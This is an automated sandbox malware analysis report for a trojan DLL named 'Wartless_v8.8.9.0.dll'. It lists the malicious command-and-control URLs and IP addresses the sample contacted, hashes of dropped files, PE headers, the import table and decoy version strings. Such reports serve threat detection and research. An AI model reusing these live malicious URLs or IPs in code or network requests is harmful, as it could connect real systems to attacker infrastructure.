http://nnnnnn.bar/drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5	regsvr32.exe, 00000005.00000002.811766322.0000000004F6B000.00000004.00000010.sdmp	true	Avira URL Cloud: malware	unknown
http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F	regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBV	~DF80E3D54E28E527BE.TMP.44.dr, {61A0A53B-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.dr	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff	{5307E23B-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.dr	false	Avira URL Cloud: safe	unknown
http://intermedia.bar/drew/tN_2FPnM2JFaCc33jtc/NPCaV6rrqIxKNKP7n1AR3O/LMe16EhvI_2Bi/SLNSQXLS/EviOTr3	{5307E23F-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.dr, ~DF847B8575778877FD.TMP.37.dr	false	Avira URL Cloud: safe	unknown
http://intermedia.bar/drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQ	{230EFA0C-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.dr, ~DFCD812BE71D10CCC1.TMP.15.dr	false	Avira URL Cloud: safe	unknown
http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP	loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/ws	loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://intermedia.bar/drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz	{230EFA0E-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.dr, ~DF1843E87D640EF8CE.TMP.15.dr	false	Avira URL Cloud: safe	unknown
http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH8	loaddll32.exe, 00000001.00000002.810955675.000000000320B000.00000004.00000010.sdmp	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/	loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://intermedia.bar/drew/	regsvr32.exe, 00000005.00000003.519535406.00000000034F2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nnnnnn.casa/	loaddll32.exe, 00000001.00000002.809730294.0000000001142000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://nnnnnn.bar/drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXe	{61A0A53F-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.dr, ~DF92A2674FCB111FAD.TMP.44.dr	true	Avira URL Cloud: malware	unknown
http://nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5	{3EF5FA36-7AD2-11EC-90E9-ECF4BB862DED}.dat.29.dr	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/eOqzQTB_2B/MowPwZPRMG1LVJR9t/fCLL0MMkzzZ7/Xm0aty4DHMK/aZD8fvqKlB4sn5/NqI7	~DF83FDEC42C12270DC.TMP.37.dr, {5307E239-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.dr	false	Avira URL Cloud: safe	unknown
http://nnnnnn.bar/drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301	loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmp, ~DF7A63264CD3C88DE7.TMP.44.dr, {61A0A53D-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.dr	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/QvhYBaeq_2F6Kr5S5lD/OqLkixN3sRa2UpR8i3hjYq/eJ9NYRqvvouL5/5HWqGU6L/VANwgL_	{230EFA0A-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.dr, ~DFA8E08E14F77016D9.TMP.15.dr	false	Avira URL Cloud: safe	unknown
http://intermedia.bar/drew/8GCWuTw3vFr_2BaLQHxEj/S2mZ_2Bs1ztZVt4J/tWEHNc4XanBwmnu/I2msIqz_2B6GZdxr2f	regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.810625001.00000000034DC000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://intermedia.bar/drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5s	{5307E23D-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.dr	false	Avira URL Cloud: safe	unknown
http://nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LA	{3EF5FA3A-7AD2-11EC-90E9-ECF4BB862DED}.dat.29.dr, ~DF1DF67103C7B135B0.TMP.29.dr	true	Avira URL Cloud: malware	unknown
http://intermedia.bar	loaddll32.exe, 00000001.00000003.648024255.0000000001167000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.648253117.0000000001167000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.349565633.00000000034F1000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.648899790.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.460653574.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.565572741.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.648715352.00000000034F2000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.462177448.0000000002794000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.348654283.0000000002793000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://intermedia.bar/drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87	loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmp, loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
31.41.46.120	intermedia.bar	Russian Federation	56577	ASRELINKRU	true
198.54.117.218	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
198.54.117.210	unknown	United States	22612	NAMECHEAP-NETUS	true
198.54.117.211	unknown	United States	22612	NAMECHEAP-NETUS	true
198.54.117.212	unknown	United States	22612	NAMECHEAP-NETUS	true
192.64.119.233	nnnnnn.casa	United States	22612	NAMECHEAP-NETUS	true
162.255.119.177	nnnnnn.bar	United States	22612	NAMECHEAP-NETUS	true
198.54.117.215	unknown	United States	22612	NAMECHEAP-NETUS	true
198.54.117.216	unknown	United States	22612	NAMECHEAP-NETUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	557481
Start date:	21.01.2022
Start time:	07:51:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 20s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Wartless_v8.8.9.0.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@45/99@38/10
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 72% (good quality ratio 68.5%) Quality average: 80.4% Quality standard deviation: 28.5%
HCA Information:	Successful, ratio: 88% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
HTTP Packets have been reduced
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.203.70.208, 152.199.19.161
Excluded domains from analysis (whitelisted): ie9comview.vo.msecnd.net, tile-service.weather.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, cs9.wpc.v0cdn.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:52:26	API Interceptor	1x Sleep call for process: regsvr32.exe modified
07:52:26	API Interceptor	2x Sleep call for process: rundll32.exe modified

Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	2.8422761351495693
Encrypted:	false
SSDEEP:	96:rZyNBiNB4sA9J3dbp3d30cp3W3FdsA9s30igp3d30cp3W3F37M30ix1993d3bb:r8N8N+BuPBzqnE
MD5:	91215A677A78CF1F56C00A0746E12C9D
SHA1:	C9FE55A00E7C53C8DAB0E927B20DCDB11FAA8D9C
SHA-256:	1DD9F6DBBE534A07F84E605C1BE0DEBD275103D4AA6A15E9455943D37802BC9D
SHA-512:	9EE2F06478B51B7B38E4DE1D4E0AB2C8FFD4D6A74D65DC8F2B71E9580158D4105953E280F0DDEC0BCBB6910657A472009B3A85110AD8946D7707E67148710615
Malicious:	false
Preview:	......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...............................................................................................................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.B.#.o.O.I.9.J.6.7.B.G.Q.6.e.z.0.u.4.Y.t.7.Q.=.=.........:.......................................

Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

File type:	MS-DOS executable, MZ for MS-DOS
Entropy (8bit):	6.163451632114402
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Wartless_v8.8.9.0.dll
File size:	442368
MD5:	3b4e9e88c0dd6e82ecc65e2d219544c6
SHA1:	5d4f4d60773ed452188c8a099b5972edbbb03f90
SHA256:	4d4bedbc795e2dd4fe929b6dc57bfc314165795e25c362959fbabc59c0a60d80
SHA512:	451eb0e4b91a7b37ecf4abe3589e1c0033ae248d0bdec0ecfd8bfec005d010b9400447bcb3707849b40d4f60e3cb5167541d5a779e6b75ca6ab38a37e18968d7
SSDEEP:	12288:YudQDXhMYGldQDXhMYGldQDXhMYGAGj7:YKyXhPSyXhPSyXhP
File Content Preview:	MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....6.........." .......P...............................@.......(...............................4..R..

Entrypoint:	0x10002022
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	406900a52ebbaff2418df7f831674972

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x34ed	0x52	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x87c0	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6b000	0x7428	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x73000	0x4f8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7d40	0xa80	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x342d	0x3600	False	0.612123842593	data	6.71334607323	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x5000	0x38b0	0x3a00	False	0.380051185345	data	4.72338733462	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x61f6b	0x5c400	False	0.720091780996	data	5.98043782395	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x6b000	0x7428	0x7600	False	0.308295815678	data	3.21705781853	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x73000	0x4f8	0x600	False	0.724609375	data	5.84430272802	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country
RT_STRING	0x6b0d0	0x32	data	English	United States
RT_VERSION	0x6b104	0x6f68	data	English	United States
RT_VERSION	0x7206c	0x3bc	data	English	United States

DLL	Import
advapi32.dll	RegCreateKeyA, RegOpenKeyA, RegEnumKeyA, RegSetValueExA, RegSetValueA, SetThreadToken, GetFileSecurityA, RegOpenKeyExA, RegCloseKey, RegCreateKeyExA, RegDeleteKeyA, RegQueryValueExA, RevertToSelf, SetFileSecurityA, RegDeleteValueA, RegQueryValueA, OpenThreadToken
comdlg32.dll	GetFileTitleA
crypt32.dll	CryptQueryObject, CertGetNameStringA, CertFreeCertificateContext
gdi32.dll	SetMapMode, CreateDIBPatternBrushPt, AngleArc, GetWorldTransform, CreateEnhMetaFileA, CreateBrushIndirect, ModifyWorldTransform, StrokePath, CreatePatternBrush, LineTo, SetRectRgn, SetColorAdjustment, PlgBlt, SetPixelV, OffsetClipRgn, GetCharacterPlacementA, GetMiterLimit, GdiComment, DPtoLP, GetFontData, GetColorAdjustment, SelectPalette, EnumFontFamiliesExA, CreatePolygonRgn, EnumMetaFile, StretchDIBits, CreateFontA, FlattenPath, GetBkColor, ExtFloodFill, ScaleViewportExtEx, OffsetViewportOrgEx, CreateICA, CreateHalftonePalette, SetTextColor, CreatePen, SetMapperFlags, GetCharWidthA, EnumObjects, PlayMetaFileRecord, GetTextCharacterExtra, SetWindowOrgEx, CreateCompatibleDC, CreateRectRgnIndirect, GetObjectA, CreatePolyPolygonRgn, GetClipRgn, Pie, GetNearestColor, GetPaletteEntries, SetTextCharacterExtra, CreateHatchBrush, CombineRgn, SetAbortProc, Arc, GetCharWidthFloatA, SetBkColor, Rectangle, CloseMetaFile, GetDeviceCaps, EndPage, SetMiterLimit, PolyBezier, GetAspectRatioFilterEx, GetClipBox, SelectClipPath, GetOutlineTextMetricsA, ExcludeClipRect, SelectObject, EndDoc, GetCurrentObject, GetRgnBox, SetWindowExtEx, SetArcDirection, ExtCreatePen, GetNearestPaletteIndex, SetBoundsRect, TextOutA, CreateMetaFileA, GetWindowOrgEx, PtInRegion, FrameRgn, GetPixel, PlayEnhMetaFile, BitBlt, GetTextAlign, MaskBlt, CreateEllipticRgn, GetPolyFillMode, CreateSolidBrush, SetBitmapBits, GetBkMode, GetViewportExtEx, FloodFill, GetBoundsRect, FillPath, GetTextMetricsA, GetROP2, ExtEscape, CreateCompatibleBitmap, EndPath, SetPixel, FillRgn, SetViewportExtEx, SetWorldTransform, GetTextExtentPoint32A, SaveDC, PolyPolyline, ResetDCA, WidenPath, GetMapMode, InvertRgn, PatBlt, PolyBezierTo, LPtoDP, CreateRoundRectRgn, CreateEllipticRgnIndirect, Ellipse, PaintRgn, PathToRegion, UpdateColors, MoveToEx, RectVisible, StartPage, StrokeAndFillPath, GetStockObject, IntersectClipRect, CreateDCA, SetTextAlign, EqualRgn, UnrealizeObject, GetCurrentPositionEx, GetGraphicsMode, RectInRegion, GetPath, CreateFontIndirectA, GetRegionData, ExtSelectClipRgn, StretchBlt, GetCharABCWidthsFloatA, RoundRect, CreatePenIndirect, PtVisible, RealizePalette, SetROP2, DeleteObject, ResizePalette, GetWindowExtEx, SetBitmapDimensionEx, SetBrushOrgEx, GetGlyphOutlineA, OffsetWindowOrgEx, GetBitmapBits, CloseEnhMetaFile, SetGraphicsMode, PolyDraw, RestoreDC, AbortPath, CreateBitmap, CreateRectRgn, SelectClipRgn, GetCharABCWidthsA, CloseFigure, Escape, GetArcDirection, GetStretchBltMode, ArcTo, PolyPolygon, GetDCOrgEx, CreateBitmapIndirect, CreateDiscardableBitmap, ExtCreateRegion, GetTextColor, SetViewportOrgEx, ScaleWindowExtEx, GetObjectType, SetTextJustification, ExtTextOutA, SetStretchBltMode, SetPolyFillMode, StartDocA, AnimatePalette, GetViewportOrgEx, SetBkMode, OffsetRgn, Polygon, GetBitmapDimensionEx, DrawEscape, GetBrushOrgEx, PlayMetaFile, CreatePalette, BeginPath, GetFontLanguageInfo, SetPaletteEntries, Polyline, PolylineTo, Chord, CopyMetaFileA, GetTextFaceA, DeleteDC, AbortDoc
kernel32.dll	lstrlenA, GetStringTypeW, LCMapStringA, CreateEventA, GlobalReAlloc, ReadFile, LockFile, DuplicateHandle, GetLastError, lstrcmpA, SetStdHandle, HeapAlloc, GetStartupInfoA, VirtualAlloc, LeaveCriticalSection, GetFileTime, SetFileTime, IsBadReadPtr, EnterCriticalSection, MoveFileA, IsValidCodePage, UnlockFile, GetVolumeInformationA, FileTimeToSystemTime, GetEnvironmentStrings, GlobalUnlock, SetFilePointer, GetPrivateProfileStringA, GetStdHandle, GetEnvironmentStringsW, GlobalFree, VirtualProtect, LoadResource, UnmapViewOfFile, MulDiv, OpenFileMappingA, GetStringTypeExA, HeapReAlloc, TlsGetValue, GetConsoleMode, GetFileAttributesA, SetUnhandledExceptionFilter, LoadLibraryW, SystemTimeToFileTime, FreeResource, CompareStringA, GlobalHandle, GetModuleHandleA, VirtualQuery, SizeofResource, SetErrorMode, GetTickCount, LCMapStringW, lstrlenW, WaitForSingleObject, GetThreadPriority, GetModuleHandleW, GetCurrentProcess, CreateThread, FindClose, IsDebuggerPresent, GetCPInfo, MapViewOfFile, HeapDestroy, FreeEnvironmentStringsA, GetConsoleOutputCP, GetConsoleCP, GetThreadLocale, GetVersionExA, CloseHandle, RaiseException, SuspendThread, CopyFileA, GetCurrentThreadId, FindResourceExA, InterlockedDecrement, InterlockedIncrement, GlobalSize, GetStringTypeA, InterlockedExchange, LocalAlloc, GetOEMCP, GlobalGetAtomNameA, LoadLibraryA, FindResourceA, GetAtomNameA, OutputDebugStringA, GlobalAlloc, GlobalDeleteAtom, TlsSetValue, GetACP, WriteConsoleW, WriteConsoleA, LocalFileTimeToFileTime, LockResource, lstrcmpW, FlushFileBuffers, OpenEventA, FindFirstFileA, GlobalAddAtomA, SetEvent, WideCharToMultiByte, FreeLibrary, GetCurrentProcessId, ResumeThread, GetModuleFileNameA, QueryPerformanceCounter, LocalFree, MultiByteToWideChar, GetPrivateProfileIntA, GetHandleInformation, GetProfileIntA, EnumResourceLanguagesA, GetFullPathNameA, GetCurrentThread, OutputDebugStringW, GetFileType, GlobalFindAtomA, HeapCreate, GetProcAddress, GlobalFlags, SetEnvironmentVariableA, GetModuleFileNameW, HeapFree, SetHandleCount, WritePrivateProfileStringA, GetShortPathNameA, GetTempFileNameA, lstrcmpiA, ExitProcess, FormatMessageA, HeapValidate, SetFileAttributesA, LocalReAlloc, GetFileSize, CompareStringW, DeleteCriticalSection, GetLocaleInfoA, TlsAlloc, GetCommandLineA, GetCurrentDirectoryA, WriteFile, GetVersion, CreateFileA, FreeEnvironmentStringsW, GlobalLock, UnhandledExceptionFilter, SetLastError, GetWindowsDirectoryA, GetProcessHeap, FileTimeToLocalFileTime, CreateFileMappingA, RtlUnwind, TlsFree, DebugBreak, GetTimeZoneInformation, TerminateProcess, SetThreadPriority, SetEndOfFile, VirtualFree, ConvertDefaultLocale, DeleteFileA, GetDiskFreeSpaceA, GetSystemInfo, GetDateFormatA, InitializeCriticalSection, VirtualProtectEx, ExitThread
ole32.dll	StringFromCLSID, ReadClassStg, CreateBindCtx, CLSIDFromString, OleRegGetUserType, OleRun, OleDuplicateData, CoMarshalInterface, CLSIDFromProgID, CoTaskMemFree, CoDisconnectObject, WriteFmtUserTypeStg, CoTreatAsClass, CoReleaseMarshalData, SetConvertStg, CoCreateInstance, CoRevokeClassObject, CoTaskMemAlloc, WriteClassStg, CoRegisterClassObject, ReadFmtUserTypeStg, CoUnmarshalInterface, StringFromGUID2, ReleaseStgMedium, CreateStreamOnHGlobal
rpcrt4.dll	NdrClientCall2, RpcMgmtIsServerListening, RpcBindingFree, RpcBindingSetAuthInfoA, RpcStringFreeA, RpcStringBindingComposeA, RpcBindingFromStringBindingA
shell32.dll	ExtractIconA, DragFinish, SHGetFileInfoA, DragAcceptFiles, DragQueryFileA
shlwapi.dll	PathFindExtensionA, PathIsUNCA, PathRemoveExtensionA, SHDeleteKeyA, PathFindFileNameA, PathStripToRootA
user32.dll	SystemParametersInfoA, GetWindowLongA, GetSystemMetrics, ExcludeUpdateRgn, IsDlgButtonChecked, SetMenuItemInfoA, SetDlgItemInt, CheckMenuItem, MoveWindow, DrawFrameControl, SetWindowLongA, GetAsyncKeyState, OpenIcon, MessageBoxA, IsWindow, WinHelpA, SendDlgItemMessageA, GetScrollInfo, SetScrollPos, GetWindowContextHelpId, InflateRect, GetMenuItemCount, DrawTextA, DestroyIcon, ChildWindowFromPoint, EndDeferWindowPos, DlgDirListA, GetClassNameA, GetMenuContextHelpId, CheckMenuRadioItem, ModifyMenuA, GetMenuState, IsWindowVisible, GetMenuItemInfoA, MsgWaitForMultipleObjects, DeferWindowPos, GetNextDlgGroupItem, SetRectEmpty, CreateCaret, UnregisterClassA, DlgDirListComboBoxA, SetWindowRgn, WindowFromDC, ChangeClipboardChain, ChildWindowFromPointEx, DrawFocusRect, IsWindowEnabled, DeleteMenu, SetMenuDefaultItem, LoadMenuIndirectA, GetForegroundWindow, FindWindowA, OffsetRect, ShowCaret, ReleaseDC, IsMenu, TrackPopupMenuEx, LoadIconA, FindWindowExA, LoadCursorA, GetSubMenu, ScrollWindowEx, UnionRect, CheckDlgButton, DrawCaption, CloseWindow, SetFocus, GetMessageW, GetWindowRgn, DrawMenuBar, ClientToScreen, SubtractRect, OpenClipboard, GetLastActivePopup, BeginDeferWindowPos, DispatchMessageW, GetCaretPos, ScrollDC, GetTopWindow, EndDialog, SetTimer, ArrangeIconicWindows, TranslateAcceleratorA, ScreenToClient, GetDesktopWindow, EqualRect, BringWindowToTop, SetWindowsHookExA, GetWindowRect, ShowScrollBar, SetWindowPlacement, CallNextHookEx, HiliteMenuItem, SetCursor, SetMenuItemBitmaps, FlashWindow, GetClipboardFormatNameA, WindowFromPoint, CreatePopupMenu, TranslateMessage, GetDlgItemTextA, GetClipboardViewer, LoadAcceleratorsA, IsIconic, InvalidateRgn, GetDialogBaseUnits, FillRect, GetClipboardOwner, GetClientRect, GetNextDlgTabItem, SetParent, EndPaint, IsChild, GetDlgCtrlID, RegisterWindowMessageA, GetCursorPos, SetWindowTextA, EnableWindow, SendNotifyMessageA, IsWindowUnicode, GetFocus, GetDCEx, DlgDirSelectComboBoxExA, CheckRadioButton, SetScrollInfo, LockWindowUpdate, UnpackDDElParam, RegisterClassA, SetScrollRange, SetMenuContextHelpId, DispatchMessageA, KillTimer, DragDetect, DestroyMenu, PostQuitMessage, ValidateRect, GetClassLongA, GetUpdateRgn, GetWindowPlacement, CharUpperA, GetMessageA, GetKeyNameTextA, GrayStringA, GetWindowThreadProcessId, ShowOwnedPopups, SendMessageA, IntersectRect, EnableMenuItem, UnhookWindowsHookEx, SetDlgItemTextA, DlgDirSelectExA, DrawStateA, SetCapture, RemovePropA, SetWindowPos, GetScrollRange, GetUpdateRect, GetCapture, SetActiveWindow, ShowWindow, InvertRect, GetActiveWindow, HideCaret, GetClassInfoExA, ValidateRgn, GetWindowTextLengthA, DefWindowProcA, SetPropA, CreateWindowExA, UpdateWindow, PtInRect, DrawTextExA, MapWindowPoints, GetMessageTime, GetPropA, AppendMenuA, GetTabbedTextExtentA, GetWindowTextA, GetParent, EnableScrollBar, BeginPaint, PostMessageA, GetMenuDefaultItem, GetSystemMenu, DrawEdge, SetWindowContextHelpId, SetCaretPos, CopyRect, GetSysColor, GetScrollPos, SetForegroundWindow, GetWindowDC, GetMenuItemID, InvalidateRect, ReuseDDElParam, LoadMenuA, LoadBitmapA, CreateMenu, IsDialogMessageA, RedrawWindow, GetMenuStringA, AdjustWindowRectEx, IsRectEmpty, MapVirtualKeyA, IsZoomed, TrackPopupMenu, ReleaseCapture, SetMenu, SetRect, TabbedTextOutA, PostThreadMessageA, DrawIcon, GetKeyState, SetClipboardViewer, DestroyWindow, GetDlgItemInt, GetDC, CreateDialogIndirectParamA, GetMessagePos, ScrollWindow, GetOpenClipboardWindow, GetMenuCheckMarkDimensions, FrameRect, GetWindow, RemoveMenu
winspool.drv	OpenPrinterA, DocumentPropertiesA, ClosePrinter

Description	Data
Unmet	Sicel
Thaumoscopic	Patagonian
Mormonweed	Inaffectation
Therewhile	Unecclesiastical
InternalName	Vapidism
Acroaesthesia	Unoratorical
Rhipidistian	Resmooth
Poriferous	Pausement
Rheocrat	Tinged
